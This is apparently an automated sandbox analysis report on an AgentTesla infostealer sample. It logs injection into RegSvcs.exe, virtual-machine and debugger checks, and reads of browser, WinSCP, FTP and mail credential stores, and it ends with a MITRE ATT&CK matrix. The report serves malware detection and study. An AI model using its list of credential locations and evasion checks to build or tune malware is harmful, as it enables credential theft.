                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597686Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597452Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597342Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597124Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595589Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595483Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595191Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594930Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594807Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594668Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593797Jump to behavior
                    Source: RegSvcs.exe, 00000002.00000002.1903502988.0000000005D01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                    Source: RegSvcs.exe, 00000005.00000002.4204586491.00000000032F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: RegSvcs.exe, 00000005.00000002.4207610159.0000000006522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                    Source: RegSvcs.exe, 00000005.00000002.4204586491.00000000032F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: troopwise.exe, 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, troopwise.exe, 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                    Source: troopwise.exe, 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: wscript.exe, 00000003.00000002.1875395771.0000017896515000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}|
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EF41FD BlockInput,0_2_00EF41FD
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E83B4C
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB5CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_00EB5CCC
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F98070 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00F98070
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_01193328 mov eax, dword ptr fs:[00000030h]0_2_01193328
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_011932C8 mov eax, dword ptr fs:[00000030h]0_2_011932C8
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_01191C68 mov eax, dword ptr fs:[00000030h]0_2_01191C68
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00FE1690 mov eax, dword ptr fs:[00000030h]1_2_00FE1690
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00FE2CF0 mov eax, dword ptr fs:[00000030h]1_2_00FE2CF0
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00FE2D50 mov eax, dword ptr fs:[00000030h]1_2_00FE2D50
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00ED81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00ED81F7
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EAA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EAA395
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EAA364 SetUnhandledExceptionFilter,0_2_00EAA364
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057A364 SetUnhandledExceptionFilter,1_2_0057A364
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0057A395
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6FA008Jump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1198008Jump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00ED8C93 LogonUserW,0_2_00ED8C93
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E83B4C
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E84A35
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE4EF5 mouse_event,0_2_00EE4EF5
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\LfZAz7DQzo.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\seskin\troopwise.exe "C:\Users\user\AppData\Local\seskin\troopwise.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\seskin\troopwise.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00ED81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00ED81F7
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00EE4C03
                    Source: LfZAz7DQzo.exe, 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp, troopwise.exe, 00000001.00000002.1764206020.0000000000605000.00000040.00000001.01000000.00000004.sdmp, troopwise.exe, 00000004.00000002.1886503345.0000000000605000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: LfZAz7DQzo.exe, troopwise.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA886B cpuid 0_2_00EA886B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00EB50D7
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EC2230 GetUserNameW,0_2_00EC2230
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00EB418A
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E84AFE
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1889523991.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.4204586491.0000000003306000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: troopwise.exe PID: 7128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: troopwise.exe PID: 4048, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6164, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: troopwise.exeBinary or memory string: WIN_81
                    Source: troopwise.exeBinary or memory string: WIN_XP
                    Source: troopwise.exeBinary or memory string: WIN_XPe
                    Source: troopwise.exeBinary or memory string: WIN_VISTA
                    Source: troopwise.exeBinary or memory string: WIN_7
                    Source: troopwise.exeBinary or memory string: WIN_8
                    Source: troopwise.exe, 00000004.00000002.1886503345.0000000000605000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1889523991.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: troopwise.exe PID: 7128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: troopwise.exe PID: 4048, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6164, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1889523991.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.4204586491.0000000003306000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: troopwise.exe PID: 7128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: troopwise.exe PID: 4048, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6164, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EF6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00EF6596
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EF6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00EF6A5A
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005C6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_005C6596
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005C6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_005C6A5A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		2
                    Valid Accounts                    		221
                    Windows Management Instrumentation                    		111
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		1
                    Exfiltration Over Alternative Protocol                    		1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts                    		2
                    Valid Accounts                    		21
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		2
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		21
                    Access Token Manipulation                    		1
                    Software Packing                    		NTDS138
                    System Information Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		1
                    DLL Side-Loading                    		LSA Secrets651
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                    Registry Run Keys / Startup Folder                    		1
                    Masquerading                    		Cached Domain Credentials231
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
